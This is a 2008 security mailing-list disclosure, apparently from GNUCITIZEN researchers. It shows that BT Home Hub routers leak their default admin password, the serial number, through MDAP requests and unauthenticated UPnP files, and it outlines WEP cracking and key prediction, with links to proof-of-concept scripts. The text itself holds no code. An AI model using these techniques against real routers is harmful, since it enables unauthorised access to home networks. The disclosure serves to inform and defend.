Re: MDAP ANTs PWNAGE: dumping the admin password of the BT Home Hub
UPDATED:
The BT Home Hub's serial number - which is the default admin password
- can also be found on UPnP description XML files. Note that no
password is required to access such files, as they're used for UPnP
(authentication-less) operations. Note: UPnP is enabled by default on
the BT Home Hub.
More information can be found on:
http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub-pt-2/
On Wed, May 21, 2008 at 10:43 PM, Adrian Pastor <ap@xxxxxxxxxxxxxx> wrote:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> We're back with more security attacks against the BT Home Hub (most
> popular wireless DSL router in the UK)!
>
> BT added a new security feature on the latest version [1] of the BT
> Home Hub firmware (6.2.6.E at time of writing) which changes the
> default admin password from 'admin' to the serial number of the
> router. From BT Support and Advice [2] site:
>
> "Firmware 6.2.6.E introduces the following improvements: Change
> default Hub Manager access password from 'admin' to your unique Hub
> serial number"
>
> Well, it turns out that you can get the serial number of the Home Hub
> by simply sending a Multi Directory Access Protocol (MDAP) multicast
> request in the network where BT Home Hub is located. Yes, you must
> already be part of the LAN where the Home Hub is present, either via
> ethernet or via Wi-Fi. However, at GNUCITIZEN, we have demonstrated
> [3] trivial ways to predict the WEP encryption key of the Home Hub if
> you know what you are doing.
>
> In summary, there are two ways to break into a BT Home Hub Wi-Fi network:
>
> - arp replays injection plus weak IVs cracking. This attack is
> typically launched using airodump-ng + aireplay-ng + aircrack-ng (I
> highly recommend using Backtrack 2 plus the Alfa USB AWUS036S Wi-Fi
> adaptor for this attack)
> - Predict the Home Hub's default WEP key by bruteforcing a list of
> potential candidates which are derived from the SSID (the SSID can be
> obtained by anyone of course)
>
> As promised in CONFidence [4], we're releasing the full details
> including PoC scripts:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> In summary, there are currently about 3 million BT Home Hub routers in
> the UK whose default WEP key AND admin password can be easily
> predicted.
>
>
> ABOUT GNUCITIZEN
>
> GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think
> Tank, which primarily deals with all aspects of the art of hacking.
> Our work has been featured in established magazines and information
> portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and
> many others. The members of the GNUCITIZEN group are well known and
> well established experts in the Information Security, Black Public
> Relations (PR) Industries and Hacker Circles with widely recognized
> experience in the government and corporate sectors and the open source
> community.
>
>
> REFERENCES
>
> [1] "What is the latest version of BT Home Hub firmware?"
> http://snipurl.com/29w9o
>
> [2] "What changes are included in the latest BT Home Hub firmware?"
> http://snipurl.com/29oo4
>
> [3] "Default key algorithm in Thomson and BT Home Hub routers"
> http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
>
> [4] "Cracking into embedded devices and beyond! - CONFidence, Krakow 2008"
> http://www.gnucitizen.org/projects/confidence-2008/Cracking%20into%20embedded%20devices%20-%20CONFidence%202K8.pdf
>
--
Adrian 'pagvac' Pastor | Security Consultant and White Hat Hacker | GNUCITIZEN
gnucitizen.com